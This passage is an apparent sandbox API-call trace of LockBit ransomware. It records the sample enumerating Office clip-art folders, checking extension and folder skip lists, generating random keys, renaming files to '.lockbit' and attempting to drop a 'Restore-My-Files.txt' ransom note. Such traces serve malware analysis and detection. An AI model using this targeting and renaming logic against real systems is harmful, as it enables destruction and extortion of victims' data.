(lpString1=".spl", lpString2=".WMF") returned -1 [0182.658] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0182.658] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0182.658] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0182.658] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0182.658] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0182.658] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0182.658] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0182.658] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0182.658] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0182.658] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0182.658] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0182.658] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0182.658] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0182.658] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0182.658] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0182.658] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="WING2.WMF") returned -1 [0182.658] lstrcmpiW (lpString1="ntldr", lpString2="WING2.WMF") returned -1 [0182.659] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="WING2.WMF") returned -1 [0182.659] lstrcmpiW (lpString1="bootsect.bak", lpString2="WING2.WMF") returned -1 [0182.659] lstrcmpiW (lpString1="autorun.inf", lpString2="WING2.WMF") returned -1 [0182.659] lstrcmpiW (lpString1="thumbs.db", lpString2="WING2.WMF") returned -1 [0182.659] lstrcmpiW (lpString1="iconcache.db", lpString2="WING2.WMF") returned -1 [0182.659] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0182.659] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WING2.WMF") returned=".WMF" [0182.659] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0182.659] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0182.659] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0182.659] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0182.659] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0182.659] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0182.659] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0182.659] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0182.659] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0182.659] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0182.659] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0182.659] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0182.659] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0182.659] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0182.659] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0182.659] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0182.659] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0182.659] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0182.659] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0182.659] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0182.659] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0182.659] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0182.660] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0182.660] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0182.660] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0182.660] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0182.660] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0182.660] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0182.660] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WING2.WMF.lockbit") returned 69 [0182.660] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WING2.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\wing2.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0182.664] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0182.664] malloc (_Size=0x40068) returned 0x3df0008 [0182.664] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=2422) returned 1 [0182.664] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0182.664] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0182.664] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0182.664] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0182.665] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0182.665] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0182.665] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0182.667] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WING2.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WING2.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0182.667] malloc (_Size=0xa0) returned 0x2073f40 [0182.667] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x2073f40, Length=0xa0, FileInformationClass=0xa) returned 0x0 [0182.668] free (_Block=0x2073f40) [0182.668] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WING2.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0182.668] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0182.668] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0182.668] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca0e1800, ftCreationTime.dwHighDateTime=0x1bd0320, ftLastAccessTime.dwLowDateTime=0x7090d6b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xca0e1800, ftLastWriteTime.dwHighDateTime=0x1bd0320, nFileSizeHigh=0x0, nFileSizeLow=0x1b03, dwReserved0=0x0, dwReserved1=0x0, cFileName="WNTER_01.MID", cAlternateFileName="")) returned 1 [0182.668] lstrcmpiW (lpString1=".", lpString2="WNTER_01.MID") returned -1 [0182.668] lstrcmpiW (lpString1="..", lpString2="WNTER_01.MID") returned -1 [0182.668] PathFindExtensionW (pszPath="WNTER_01.MID") returned=".MID" [0182.668] lstrcmpiW (lpString1=".386", lpString2=".MID") returned -1 [0182.668] lstrcmpiW (lpString1=".cmd", lpString2=".MID") returned -1 [0182.668] lstrcmpiW (lpString1=".exe", lpString2=".MID") returned -1 [0182.668] lstrcmpiW (lpString1=".ani", lpString2=".MID") returned -1 [0182.668] lstrcmpiW (lpString1=".adv", lpString2=".MID") returned -1 [0182.668] lstrcmpiW (lpString1=".theme", lpString2=".MID") returned 1 [0182.668] lstrcmpiW (lpString1=".msi", lpString2=".MID") returned 1 [0182.668] lstrcmpiW (lpString1=".msp", lpString2=".MID") returned 1 [0182.669] lstrcmpiW (lpString1=".com", lpString2=".MID") returned -1 [0182.669] lstrcmpiW (lpString1=".diagpkg", lpString2=".MID") returned -1 [0182.669] lstrcmpiW (lpString1=".nls", lpString2=".MID") returned 1 [0182.669] lstrcmpiW (lpString1=".diagcab", lpString2=".MID") returned -1 [0182.669] lstrcmpiW (lpString1=".lock", lpString2=".MID") returned -1 [0182.669] lstrcmpiW (lpString1=".ocx", lpString2=".MID") returned 1 [0182.669] lstrcmpiW (lpString1=".mpa", lpString2=".MID") returned 1 [0182.669] lstrcmpiW (lpString1=".cpl", lpString2=".MID") returned -1 [0182.669] lstrcmpiW (lpString1=".mod", lpString2=".MID") returned 1 [0182.669] lstrcmpiW (lpString1=".hta", lpString2=".MID") returned -1 [0182.669] lstrcmpiW (lpString1=".icns", lpString2=".MID") returned -1 [0182.669] lstrcmpiW (lpString1=".prf", lpString2=".MID") returned 1 [0182.669] lstrcmpiW (lpString1=".rtp", lpString2=".MID") returned 1 [0182.669] lstrcmpiW (lpString1=".diagcfg", lpString2=".MID") returned -1 [0182.669] lstrcmpiW (lpString1=".msstyles", lpString2=".MID") returned 1 [0182.669] lstrcmpiW (lpString1=".bin", lpString2=".MID") returned -1 [0182.669] lstrcmpiW (lpString1=".hlp", lpString2=".MID") returned -1 [0182.669] lstrcmpiW (lpString1=".shs", lpString2=".MID") returned 1 [0182.669] lstrcmpiW (lpString1=".drv", lpString2=".MID") returned -1 [0182.669] lstrcmpiW (lpString1=".wpx", lpString2=".MID") returned 1 [0182.669] lstrcmpiW (lpString1=".bat", lpString2=".MID") returned -1 [0182.669] lstrcmpiW (lpString1=".rom", lpString2=".MID") returned 1 [0182.669] lstrcmpiW (lpString1=".msc", lpString2=".MID") returned 1 [0182.669] lstrcmpiW (lpString1=".spl", lpString2=".MID") returned 1 [0182.669] lstrcmpiW (lpString1=".ps1", lpString2=".MID") returned 1 [0182.669] lstrcmpiW (lpString1=".msu", lpString2=".MID") returned 1 [0182.669] lstrcmpiW (lpString1=".ics", lpString2=".MID") returned -1 [0182.669] lstrcmpiW (lpString1=".key", lpString2=".MID") returned -1 [0182.669] lstrcmpiW (lpString1=".mp3", lpString2=".MID") returned 1 [0182.669] lstrcmpiW (lpString1=".reg", lpString2=".MID") returned 1 [0182.670] lstrcmpiW (lpString1=".dll", lpString2=".MID") returned -1 [0182.670] lstrcmpiW (lpString1=".ini", lpString2=".MID") returned -1 [0182.670] lstrcmpiW (lpString1=".idx", lpString2=".MID") returned -1 [0182.670] lstrcmpiW (lpString1=".sys", lpString2=".MID") returned 1 [0182.670] lstrcmpiW (lpString1=".hlp", lpString2=".MID") returned -1 [0182.670] lstrcmpiW (lpString1=".ico", lpString2=".MID") returned -1 [0182.670] lstrcmpiW (lpString1=".lnk", lpString2=".MID") returned -1 [0182.670] lstrcmpiW (lpString1=".rdp", lpString2=".MID") returned 1 [0182.670] lstrcmpiW (lpString1=".lockbit", lpString2=".MID") returned -1 [0182.670] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="WNTER_01.MID") returned -1 [0182.670] lstrcmpiW (lpString1="ntldr", lpString2="WNTER_01.MID") returned -1 [0182.670] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="WNTER_01.MID") returned -1 [0182.670] lstrcmpiW (lpString1="bootsect.bak", lpString2="WNTER_01.MID") returned -1 [0182.670] lstrcmpiW (lpString1="autorun.inf", lpString2="WNTER_01.MID") returned -1 [0182.670] lstrcmpiW (lpString1="thumbs.db", lpString2="WNTER_01.MID") returned -1 [0182.670] lstrcmpiW (lpString1="iconcache.db", lpString2="WNTER_01.MID") returned -1 [0182.670] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0182.670] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WNTER_01.MID") returned=".MID" [0182.670] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0182.670] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0182.670] lstrcmpiW (lpString1=".7z", lpString2=".MID") returned -1 [0182.670] lstrcmpiW (lpString1=".ckp", lpString2=".MID") returned -1 [0182.670] lstrcmpiW (lpString1=".dacpac", lpString2=".MID") returned -1 [0182.670] lstrcmpiW (lpString1=".db", lpString2=".MID") returned -1 [0182.670] lstrcmpiW (lpString1=".db-shm", lpString2=".MID") returned -1 [0182.670] lstrcmpiW (lpString1=".db-wal", lpString2=".MID") returned -1 [0182.670] lstrcmpiW (lpString1=".db3", lpString2=".MID") returned -1 [0182.670] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0182.670] lstrcmpiW (lpString1=".dbc", lpString2=".MID") returned -1 [0182.670] lstrcmpiW (lpString1=".dbs", lpString2=".MID") returned -1 [0182.670] lstrcmpiW (lpString1=".dbt", lpString2=".MID") returned -1 [0182.671] lstrcmpiW (lpString1=".dbv", lpString2=".MID") returned -1 [0182.671] lstrcmpiW (lpString1=".frm", lpString2=".MID") returned -1 [0182.671] lstrcmpiW (lpString1=".mdf", lpString2=".MID") returned -1 [0182.671] lstrcmpiW (lpString1=".mrg", lpString2=".MID") returned 1 [0182.671] lstrcmpiW (lpString1=".mwb", lpString2=".MID") returned 1 [0182.671] lstrcmpiW (lpString1=".myd", lpString2=".MID") returned 1 [0182.671] lstrcmpiW (lpString1=".ndf", lpString2=".MID") returned 1 [0182.671] lstrcmpiW (lpString1=".qry", lpString2=".MID") returned 1 [0182.671] lstrcmpiW (lpString1=".sdb", lpString2=".MID") returned 1 [0182.671] lstrcmpiW (lpString1=".sdf", lpString2=".MID") returned 1 [0182.671] lstrcmpiW (lpString1=".sql", lpString2=".MID") returned 1 [0182.671] lstrcmpiW (lpString1=".sqlite", lpString2=".MID") returned 1 [0182.671] lstrcmpiW (lpString1=".sqlite3", lpString2=".MID") returned 1 [0182.671] lstrcmpiW (lpString1=".sqlitedb", lpString2=".MID") returned 1 [0182.671] lstrcmpiW (lpString1=".tmd", lpString2=".MID") returned 1 [0182.671] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WNTER_01.MID.lockbit") returned 72 [0182.671] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WNTER_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\wnter_01.mid"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0182.672] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0182.672] malloc (_Size=0x40068) returned 0x1ff1e60 [0182.672] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=6915) returned 1 [0182.672] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0182.673] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0182.673] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0182.673] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0182.673] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0182.673] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0182.673] ReadFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0182.677] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WNTER_01.MID.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WNTER_01.MID.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0182.677] malloc (_Size=0xa6) returned 0x1fa2ed8 [0182.677] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0182.678] free (_Block=0x1fa2ed8) [0182.678] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WNTER_01.MID" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0182.678] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0182.678] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0182.678] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca0e1800, ftCreationTime.dwHighDateTime=0x1bd0320, ftLastAccessTime.dwLowDateTime=0x7090d6b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xca0e1800, ftLastWriteTime.dwHighDateTime=0x1bd0320, nFileSizeHigh=0x0, nFileSizeLow=0x1b03, dwReserved0=0x0, dwReserved1=0x0, cFileName="WNTER_01.MID", cAlternateFileName="")) returned 0 [0182.678] FindClose (in: hFindFile=0x55fe38 | out: hFindFile=0x55fe38) returned 1 [0182.678] FindNextFileW (in: hFindFile=0x55fdf8, lpFindFileData=0x3d6c970 | out: lpFindFileData=0x3d6c970*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x56406370, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x56406370, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x56406370, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Publisher", cAlternateFileName="PUBLIS~1")) returned 1 [0182.678] lstrcmpiW (lpString1=".", lpString2="Publisher") returned -1 [0182.678] lstrcmpiW (lpString1="..", lpString2="Publisher") returned -1 [0182.678] lstrcmpiW (lpString1="Publisher", lpString2="$windows.~bt") returned 1 [0182.678] lstrcmpiW (lpString1="Publisher", lpString2="intel") returned 1 [0182.679] lstrcmpiW (lpString1="Publisher", lpString2="msocache") returned 1 [0182.679] lstrcmpiW (lpString1="Publisher", lpString2="$recycle.bin") returned 1 [0182.679] lstrcmpiW (lpString1="Publisher", lpString2="$windows.~ws") returned 1 [0182.679] lstrcmpiW (lpString1="Publisher", lpString2="tor browser") returned -1 [0182.679] lstrcmpiW (lpString1="Publisher", lpString2="boot") returned 1 [0182.679] lstrcmpiW (lpString1="Publisher", lpString2="system volume information") returned -1 [0182.679] lstrcmpiW (lpString1="Publisher", lpString2="perflogs") returned 1 [0182.679] lstrcmpiW (lpString1="Publisher", lpString2="google") returned 1 [0182.679] lstrcmpiW (lpString1="Publisher", lpString2="application data") returned 1 [0182.679] lstrcmpiW (lpString1="Publisher", lpString2="windows") returned -1 [0182.679] lstrcmpiW (lpString1="Publisher", lpString2="windows.old") returned -1 [0182.679] lstrcmpiW (lpString1="Publisher", lpString2="appdata") returned 1 [0182.679] lstrcmpiW (lpString1="Publisher", lpString2="Windows nt") returned -1 [0182.679] lstrcmpiW (lpString1="Publisher", lpString2="Msbuild") returned 1 [0182.679] lstrcmpiW (lpString1="Publisher", lpString2="Microsoft") returned 1 [0182.679] lstrcmpiW (lpString1="Publisher", lpString2="All users") returned 1 [0182.679] lstrcmpiW (lpString1="Publisher", lpString2="mozilla") returned 1 [0182.679] lstrcmpiW (lpString1="Publisher", lpString2="Microsoft.NET") returned 1 [0182.679] lstrcmpiW (lpString1="Publisher", lpString2="microsoft shared") returned 1 [0182.679] lstrcmpiW (lpString1="Publisher", lpString2="Internet Explorer") returned 1 [0182.679] lstrcmpiW (lpString1="Publisher", lpString2="common files") returned 1 [0182.679] lstrcmpiW (lpString1="Publisher", lpString2="opera") returned 1 [0182.679] lstrcmpiW (lpString1="Publisher", lpString2="Windows Journal") returned -1 [0182.679] wsprintfW (in: param_1=0x3d6c550, param_2="%s\\%s" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher") returned 52 [0182.679] wsprintfW (in: param_1=0x3d6b928, param_2="%s\\*" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\*") returned 54 [0182.680] FindFirstFileExW (in: lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\*", fInfoLevelId=0x0, lpFindFileData=0x3d6bd48, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x3d6bd48) returned 0x55fe38 [0182.683] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0182.683] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x56406370, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x56406370, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x56406370, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0182.683] lstrcmpiW (lpString1=".", lpString2="..") returned -1 [0182.683] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0182.683] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x56406370, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x7089b290, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7089b290, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Backgrounds", cAlternateFileName="BACKGR~1")) returned 1 [0182.683] lstrcmpiW (lpString1=".", lpString2="Backgrounds") returned -1 [0182.683] lstrcmpiW (lpString1="..", lpString2="Backgrounds") returned -1 [0182.683] lstrcmpiW (lpString1="Backgrounds", lpString2="$windows.~bt") returned 1 [0182.683] lstrcmpiW (lpString1="Backgrounds", lpString2="intel") returned -1 [0182.683] lstrcmpiW (lpString1="Backgrounds", lpString2="msocache") returned -1 [0182.684] lstrcmpiW (lpString1="Backgrounds", lpString2="$recycle.bin") returned 1 [0182.684] lstrcmpiW (lpString1="Backgrounds", lpString2="$windows.~ws") returned 1 [0182.684] lstrcmpiW (lpString1="Backgrounds", lpString2="tor browser") returned -1 [0182.684] lstrcmpiW (lpString1="Backgrounds", lpString2="boot") returned -1 [0182.684] lstrcmpiW (lpString1="Backgrounds", lpString2="system volume information") returned -1 [0182.684] lstrcmpiW (lpString1="Backgrounds", lpString2="perflogs") returned -1 [0182.684] lstrcmpiW (lpString1="Backgrounds", lpString2="google") returned -1 [0182.684] lstrcmpiW (lpString1="Backgrounds", lpString2="application data") returned 1 [0182.684] lstrcmpiW (lpString1="Backgrounds", lpString2="windows") returned -1 [0182.684] lstrcmpiW (lpString1="Backgrounds", lpString2="windows.old") returned -1 [0182.684] lstrcmpiW (lpString1="Backgrounds", lpString2="appdata") returned 1 [0182.684] lstrcmpiW (lpString1="Backgrounds", lpString2="Windows nt") returned -1 [0182.684] lstrcmpiW (lpString1="Backgrounds", lpString2="Msbuild") returned -1 [0182.684] lstrcmpiW (lpString1="Backgrounds", lpString2="Microsoft") returned -1 [0182.684] lstrcmpiW (lpString1="Backgrounds", lpString2="All users") returned 1 [0182.684] lstrcmpiW (lpString1="Backgrounds", lpString2="mozilla") returned -1 [0182.684] lstrcmpiW (lpString1="Backgrounds", lpString2="Microsoft.NET") returned -1 [0182.684] lstrcmpiW (lpString1="Backgrounds", lpString2="microsoft shared") returned -1 [0182.684] lstrcmpiW (lpString1="Backgrounds", lpString2="Internet Explorer") returned -1 [0182.684] lstrcmpiW (lpString1="Backgrounds", lpString2="common files") returned -1 [0182.684] lstrcmpiW (lpString1="Backgrounds", lpString2="opera") returned -1 [0182.684] lstrcmpiW (lpString1="Backgrounds", lpString2="Windows Journal") returned -1 [0182.684] wsprintfW (in: param_1=0x3d6b928, param_2="%s\\%s" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds") returned 64 [0182.684] wsprintfW (in: param_1=0x3d6ad00, param_2="%s\\*" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\*") returned 66 [0182.684] FindFirstFileExW (in: lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\*", fInfoLevelId=0x0, lpFindFileData=0x3d6b120, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x3d6b120) returned 0x55fe78 [0182.686] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0182.686] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x56406370, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x7089b290, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7089b290, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0182.686] lstrcmpiW (lpString1=".", lpString2="..") returned -1 [0182.686] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0182.686] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f046d00, ftCreationTime.dwHighDateTime=0x1bd9a89, ftLastAccessTime.dwLowDateTime=0x65f01310, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6f046d00, ftLastWriteTime.dwHighDateTime=0x1bd9a89, nFileSizeHigh=0x0, nFileSizeLow=0xf77, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0143743.GIF", cAlternateFileName="")) returned 1 [0182.686] lstrcmpiW (lpString1=".", lpString2="J0143743.GIF") returned -1 [0182.686] lstrcmpiW (lpString1="..", lpString2="J0143743.GIF") returned -1 [0182.686] PathFindExtensionW (pszPath="J0143743.GIF") returned=".GIF" [0182.686] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0182.687] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0182.687] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0182.687] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0182.687] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned 